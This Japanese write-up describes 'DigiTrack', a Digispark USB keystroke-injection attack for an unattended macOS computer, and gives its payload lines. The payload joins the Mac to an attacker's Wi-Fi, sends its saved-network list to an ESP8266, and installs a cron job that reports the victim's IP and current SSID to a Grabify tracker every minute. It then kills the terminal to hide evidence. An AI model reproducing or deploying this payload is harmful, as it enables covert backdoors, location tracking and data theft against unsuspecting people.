DigiTrack
30秒で、この攻撃はMacOSコンピュータが過去に接続したネットワークを把握し、60秒ごとに現在のIPアドレスとWi-Fiネットワークを追跡するスクリプトを仕込みます。

新機能: Hardtracker - Digispark VPN無効化ツール:MacOSコンピュータの近くのWi-FiネットワークのIPアドレスとBSSID/SSIDを60秒ごとにGrabifyトラッカーに送信します。
これは5ドルの攻撃で、以下のことを行います:
- 被害者のコンピュータにWi-Fiバックドアを挿入し、Wi-Fi範囲内であればいつでも被害者のデータ接続をキャプチャできるようにします。
- 被害者が過去に接続したすべてのネットワークのリストを盗みます(追跡、分類、データ接続の乗っ取りのために)。
- 現在のIPアドレスと接続中のネットワークを60秒ごとにGrabifyリンクに送信する追跡ジョブを挿入します。
攻撃の流れ:被害者がMacOSコンピュータを30秒間放置します。攻撃者は攻撃ペイロードをロードしたDigiSparkボードを挿入します。ペイロードは次のようになります(遅延と単一キーストロークは省略):
DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
- ネットワーク "Sneakernet" を信頼できるネットワークリストに追加し、接続します。
DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");
- 接続後、MacOSコンピュータが過去に接続したすべてのネットワークをリストアップするCURLリクエストを、"Sneakernet"ネットワークを作成しているesp8266に送信します。&は、処理に時間がかかる場合にバックグラウンドで実行するためのもので、-mは10秒のタイマーを設定して時間がかかりすぎるのを防ぎます。これにより、被害者が参加したWi-Fiネットワークと、コンピュータに確認なしで接続させるネットワークがわかります。
DigiKeyboard.print("export VISUAL=nano; crontab -e");
DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");
- CURLの出力を抑制し、現在接続しているWi-Fiネットワークのネットワーク名を取得します。これを追跡URLにCURLリクエストとともに送信し、ターゲットのIPアドレスと現在接続しているWi-Fiネットワークを60秒ごとに配信します。
DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");
- 最後に、すべてのバックグラウンドプロセスが終了するのを待ち、ターミナルウィンドウを強制終了して証拠を隠します。
総実行時間は約30秒で、Digisparkがスケッチのアップロードを待つ数秒は含まれません。
注意: Grabifyが「I'm under attack」モードに入り、チェックインを許可しない場合があります。次の行を探してください:
div class="cf-browser-verification cf-im-under-attack"
それが表示された場合、IPアドレスがCloudflareによってブロックされています。